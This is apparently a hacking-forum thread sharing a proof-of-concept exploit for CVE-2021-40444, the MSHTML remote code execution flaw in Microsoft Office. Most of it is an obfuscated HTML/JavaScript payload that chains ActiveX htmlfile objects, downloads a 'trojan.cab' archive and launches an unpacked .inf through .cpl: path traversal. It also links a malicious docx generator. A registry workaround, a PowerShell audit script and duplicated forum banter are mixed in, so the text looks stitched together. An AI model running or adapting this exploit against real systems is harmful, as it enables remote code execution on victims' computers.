
Local RCE, MSHTML, CVE-2021-40444

z3r013

New cool vulnerability in MS Office which triggers without a macro.
As far as I know there's no payload generator available, but if I find one I'll share it here.

So the whole magic in this exploit happens while opening the document: it loads an HTML file which contains obfuscated JS.



- Analyzing Microsoft Zero-Day Exploit (CVE-2021-40444)
PoC

HTML:
<!DOCTYPE html>
<html>
 <head>
  <meta http-equiv="Expires" content="-1">
  <meta http-equiv="X-UA-Compatible" content="IE=11">
 </head>
 <body>
  <script>
// Wrapped as an IIFE: a bare `function(){ ... }();` is a syntax error
(function(){
  // Attach a scratch iframe, falling back to documentElement if body is not available yet
  try{
    window['HTMLElement']['prototype']['appendChild']['call'](window['document']['body'],
      window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
  }catch(_0x1c747c){
    window['HTMLElement']['prototype']['appendChild']['call'](window['document']['documentElement'],
      window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
  }
  // Chain of nested ActiveX 'htmlfile' documents, each created via the previous one's Script object
  iframeActxHtml1 = new window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentWindow']['ActiveXObject']('htmlfile');
  window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentDocument']['open']()['close']();
  try{
    window['HTMLElement']['prototype']['removeChild']['call'](window['document']['body'],
      window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
  }catch(_0x5afb73){
    window['HTMLElement']['prototype']['removeChild']['call'](window['document']['documentElement'],
      window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
  }
  iframeActxHtml1['open']()['close']();
  var iframeActxHtml2 = iframeActxHtml1['Script']['ActiveXObject']('htmlFile');
  iframeActxHtml2['open']()['close']();
  iframeActxHtml3 = iframeActxHtml2['Script']['ActiveXObject']('htmlFile');
  iframeActxHtml3['open']()['close']();
  var iframeActxHtml4 = new iframeActxHtml3['Script']['ActiveXObject']('htmlFile');
  iframeActxHtml4['open']()['close']();
  var actx_html_0=new ActiveXObject('htmlfile'),
      actx_html_1=new ActiveXObject('htmlfile'),
      actx_html_2=new ActiveXObject('htmlfile'),
      actx_html_3=new ActiveXObject('htmlfile'),
      actx_html_4=new ActiveXObject('htmlfile'),
      actx_html_5=new ActiveXObject('htmlfile'),
      xmlhttpreq1=new window['XMLHttpRequest']();
  window['setTimeout']=window['setTimeout'];
  // Synchronous fetch of the CAB archive (localhost is the sample's placeholder host)
  window['XMLHttpRequest']['prototype']['open']['call'](xmlhttpreq1,'GET','http://localhost/trojan.cab',![]);
  window['XMLHttpRequest']['prototype']['send']['call'](xmlhttpreq1);
  iframeActxHtml4['Script']['document']['write']('<body>');
  // <object> whose codebase points at the CAB, so the control loader downloads and unpacks it
  var cabloadunpack=window['Document']['prototype']['createElement']['call'](iframeActxHtml4['Script']['document'],'object');
  cabloadunpack['setAttribute']('codebase','http://localhost/trojan.cab#version=5,0,0,0');
  cabloadunpack['setAttribute']('classid','CLSID:b7771b25-4e74-4168-add9-04062d629d9a');
  window['HTMLElement']['prototype']['appendChild']['call'](iframeActxHtml4['Script']['document']['body'],cabloadunpack);
  // .cpl: protocol handler, first with dummy targets, then with relative paths to the unpacked .inf
  actx_html_0['Script']['location']='.cpl:123';
  actx_html_0['Script']['location']='.cpl:123';
  actx_html_0['Script']['location']='.cpl:123';
  actx_html_0['Script']['location']='.cpl:123';
  actx_html_0['Script']['location']='.cpl:123';
  actx_html_0['Script']['location']='.cpl:123';
  actx_html_0['Script']['location']='.cpl:123';
  actx_html_0['Script']['location']='.cpl:123';
  actx_html_0['Script']['location']='.cpl:123';
  actx_html_0['Script']['location']='.cpl:../../../AppData/Local/Temp/Low/whoiam.inf';
  actx_html_1['Script']['location']='.cpl:../../../AppData/Local/Temp/whoiam.inf';
  actx_html_2['Script']['location']='.cpl:../../../../AppData/Local/Temp/Low/whoiam.inf';
  actx_html_3['Script']['location']='.cpl:../../../../AppData/Local/Temp/whoiam.inf';
  actx_html_4['Script']['location']='.cpl:../../../../../Temp/Low/whoiam.inf';
  actx_html_3['Script']['location']='.cpl:../../../../../Temp/whoiam.inf';
  actx_html_3['Script']['location']='.cpl:../../Low/whoiam.inf';
  actx_html_3['Script']['location']='.cpl:../../whoiam.inf';
})();
  </script>
 </body>
</html>

To disable installing ActiveX controls in Internet Explorer in all zones, paste the following into a text file and save it with the .reg file extension:

Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1001"=dword:00000003
"1004"=dword:00000003

Double-click the .reg file to apply it to your Policy hive.
Reboot the system to ensure the new configuration is applied.

./r1z
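Added example (not part of the post or of the Microsoft workaround it quotes): a PowerShell audit that reads the same four Policies zone keys the .reg file writes and reports any zone where 1001 or 1004 is not set to 3. It assumes only the key path and value names shown above; the value meanings (1001 = download signed ActiveX controls, 1004 = download unsigned ActiveX controls, 3 = Disable) are Internet Explorer's standard URL action codes. A missing key or value is reported as not mitigated, since nothing in the Policies hive then forces the setting.

```powershell
# Added audit script: checks whether the CVE-2021-40444 registry workaround
# (ActiveX download disabled in zones 0-3) is actually in effect.
# Only the path and value names from the .reg file above are assumed.
$PolicyBase = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones'
$ValueNames = '1001', '1004'   # 1001 = download signed ActiveX, 1004 = download unsigned ActiveX
$Disabled   = 3                # 3 = Disable in the IE URL action scheme

function Test-ActiveXWorkaround {
    param([string]$BasePath = $PolicyBase)

    $results = foreach ($zone in 0..3) {
        $key = Join-Path $BasePath $zone
        foreach ($name in $ValueNames) {
            $value = $null
            if (Test-Path $key) {
                # A missing value is a finding, not an exception, so suppress the error
                $value = (Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue).$name
            }
            [pscustomobject]@{
                Zone      = $zone
                Value     = $name
                Current   = $value                 # $null when the key or value is absent
                Mitigated = ($value -eq $Disabled)
            }
        }
    }
    return $results
}

$audit = Test-ActiveXWorkaround
$audit | Format-Table -AutoSize

if ($audit.Mitigated -contains $false) {
    Write-Warning 'Workaround incomplete: at least one zone still permits ActiveX downloads.'
} else {
    Write-Host 'Workaround applied in all four zones.'
}
```

The check covers only the Policies hive that the .reg file populates; a setting applied per user under HKCU is out of scope here.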
Yeah. You updated the post while I was making the answer.
My bad.
It's okay; we all know you talk too much here for nothing.
Yeah. You updated the post while I was making the answer.
My bad.
The Yank is correcting himself, and you wanted to come down on him.
That's not the done thing.
The Yank is correcting himself, and you wanted to come down on him.
That's not the done thing.
He's just trying to improve himself by writing like a robot to get more reactions; no worries.
He's just trying to improve himself by writing like a robot; no worries.
I don't give a damn about anyone; am I a dandelion of God?
lol.
I'm sorry you got used to treatment like that. And if somebody called you a dog, you'd do just as they say. But if you don't respect yourself, that doesn't mean everybody else does the same, dawg.
But pasting code from GitHub is a hell of a skill, doggy. :)

CVE-2021-40444 PoC

Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)

Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)

You need to install lcab first (sudo apt-get install lcab)



https://github.com/lockedbyte/CVE-2021-40444

Don't forget to press "Like", it's free <3
Haven't enough threads about this exploit been spawned on the forum already?
Merged into one thread.

z3r013 Use the search, so as not to spawn duplicate threads.